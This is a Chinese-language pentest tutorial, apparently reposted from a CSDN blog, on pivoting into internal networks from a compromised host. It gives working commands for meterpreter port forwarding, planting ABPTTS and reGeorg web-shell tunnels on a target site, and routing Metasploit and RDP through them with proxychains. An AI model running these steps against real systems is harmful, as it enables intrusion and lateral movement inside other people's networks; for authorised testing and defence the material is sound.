滲透測試之三內網跳板


搭建內網的轉發跳板

  • 當成功控制一個網絡中的一台主機后,由於后面的主機都在內網中無法訪問,所以需要在跳板機上搭建代理,實現對內網中的其他主機的訪問

portfwd是一款強大的端口轉發工具,支持TCP,UDP,支持IPV4–IPV6的轉換轉發。並且內置於meterpreter。

攻擊機: 192.168.1.5 Debian
靶機: 192.168.1.4 Windows 7
192.168.1.119 Windows 2003


靶機IP為:192.168.1.119—windows 2003—x64
需要轉發端口為:80,3389


執行命令如下


if defined PSModulePath (echo ok!) else (echo sorry!)


查看使用參數


meterpreter > portfwd ‐h


添加本地33389到目標主機3389的端口轉發


meterpreter > portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389


添加本地30080到目標主機80的端口轉發


meterpreter> portfwd add ‐l 30080 ‐r 192.168.1.119 ‐p 80


查看端口轉發信息


meterpreter > portfwd


這時訪問本地主機的33389端口相當於訪問目標主機的3389端口
訪問本地主機的30080端口相當於訪問目標主機的80端口
這種情況需要在跳板機上使用msf拿到目標主機的shell,實際應用場景不多

ABPTTS

ABPTTS是NCC Group在2016年blackhat推出的一款將TCP流量通過HTTP/HTTPS進行流量轉發,在目前雲主機的大環境中,發揮了比較重要的作用,可以通過腳本進行RDP,SSH,Meterpreter的交互與連接。也意味着這樣可以建立一個通過80端口得流量出站來逃避防火牆。與其它http隧道不同的是,abptts是全加密。
安裝與生成payload:


git clone https://github.com/nccgroup/ABPTTS.git
pip install pycrypto
cd ABPTTS/
python abpttsfactory.py ‐o webshell


將生成的payload放入目標網站
在跳板主機上執行代理命令


python abpttsclient.py ‐c webshell/config.txt ‐u “代理網頁的URL” ‐f 跳板機IP:跳板機端口/目標機IP:目標機端口


這時訪問跳板主機的IP和端口就相當於訪問目標主機的IP和端口
這種不支持PHP

reGeorg

reGeorg的前身是2008年SensePost在BlackHat USA 2008 的 reDuh延伸與擴展。也是目前安全從業人員使用最多,范圍最廣,支持多豐富的一款http隧道。從本質上講,可以將JSP/PHP/ASP/ASPX等頁面上傳到目標服務器,便可以訪問該服務器后面的主機。
安裝:


git clone https://github.com/sensepost/reGeorg.git
pip install urllib3


將其中的網頁文件放入跳板主機的網站目錄下,PHP環境建議使用tunnel.nosocket.php,
然后測試腳本是否能正常訪問
攻擊機這時就可以搞事情啦
運行下列命令


比如:reGeorgSocksProxy.py -p 9999 -u http://192.168.80.139/zvuldrill/tunnel.nosocket.php


如果攻擊機是Windows系統,則使用Proxifier進行代理設置

 

  • 設置代理服務器端口為9999

 

 

 

  • 代理規則默認即可

 

 

當需要運行一個使用跳板的軟件時,
右擊“mstsc.exe”,選擇“proxifier”-》proxy socks5 127.0.0.1進行遠程連接

 

 

這時候這個軟件的流量就可以通過跳板進入內網
如果攻擊機為Linux,使用proxychains
可以下載安裝,Kali本身也帶有這個工具
設置kali的proxychains代理地址和端口(通過本地的socks5 2333端口出去)

vi /etc/proxychains.conf
  • 配置好后通過 reGeory 來打通本地和目標的通道
reGeorgSocksProxy.py -p 9999 -u http://192.168.80.139/zvuldrill/tunnel.nosocket.php

本地所有工具都可通過目標服務器進一步攻擊(這樣kali的所有工具就如同全部在內網那台getshell的服務器上)
所有工具使用命令前加 proxychains
比如:proxychains msfconsole
連接內網windows機器proxychains rdesktop x.x.x.x:3389 -u test -p 123456

利用msf可以簡化很多操作

添加路由命令


run autoroute -s 192.168.80.0/24
————————————————
版權聲明:本文為CSDN博主「習慣積淀」的原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/weixin_44479297/article/details/90481121

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM